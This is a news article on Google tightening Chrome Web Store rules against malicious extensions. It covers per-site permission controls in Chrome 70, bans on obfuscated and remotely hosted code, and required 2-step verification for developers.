Whether it is because of a overworked reviewers, obfuscated code, or the use of external scripts, Malicious Chrome extensions have become a huge problem for Google with new ones being added to the Chrome Web Store every day.
In an announcement today, Google has stated that they are dropping the hammer on malicious extensions and will no longer tolerate ones that ask for powerful permissions for no reason, use external scripts, or obfuscate their code.
In the current version of Chrome, an extension has the ability to get full access to all of the data and content of a web site that you are visiting. This allows beneficial extensions to be created that modify the skin of a site, add extra features, or fix bugs on sites.
At the same time, this also allows extensions to inject advertisements, steal social profile information, inject in-browser miners, steal login information, access other web sites, and perform a variety of other malicious activities.
With Chrome 70, users will now have the ability to restrict the sites an extension has access. With this new setting, you can specify that the extension only has access to a site "When you click the extension, on a specific site, or on all sites.
Unfortunately, according to Google's User Controls For Host Permissions: Transition Guide it appears that users will need to make these changes themselves, rather than having them become restrictive by default.
What happens to my current users' settings? This change will not immediately affect any current permissions granted to your extension. That is, it will continue to operate as before unless the user takes action to restrict the sites it is allowed to access. In future releases, Chrome will provide more controls to users to adjust settings.
Extensions that request powerful permissions, or full access to sites, will now be subject to additional review. Google has also stated that they will be looking closely at extensions that utilize remotely hosted code and outgoing monitoring.
Whether this will include Google analytics, which is heavily used by new tab and search hijacking extensions to track users, is unknown. It also does not indicate whether search redirects for the sole purpose of tracking a user's activity will be allowed as well.
Overall, Google wants a tight package that makes it easier to perform a review and do not want to have to examine off site code that can easily be changed whenever a developer wishes.
"Your extension’s permissions should be as narrowly-scoped as possible, and all your code should be included directly in the extension package, to minimize review time."
Analyzing extensions can be time consuming as most malicious Chrome extensions are obfuscated. This means the developers use special tools that make it harder to see what the extension's scripts are doing.
As Google is stepping up their review process, this means that they need to make it easier for them to review the code. This is a welcome change and one that will make it easier for not only Google but for people like myself who commonly analyze Chrome extensions to look for malicious behavior.
"Today over 70% of malicious and policy violating extensions that we block from Chrome Web Store contain obfuscated code. At the same time, because obfuscation is mainly used to conceal code functionality, it adds a great deal of complexity to our review process. This is no longer acceptable given the aforementioned review process changes."
This policy still allows developers to minify their extension's code with the following methods:
In the past, very popular extensions, such as MEGA, have been hacked and been replaced with a malicious variant. Due to this, in 2019 Google will require all Chrome extension developers to enable 2-Step verification on their Chrome Web Store developer accounts.
By doing so, it will make it much harder for an attacker to hack an account as they would need the developer's authentication device, such as their mobile phone, to do so.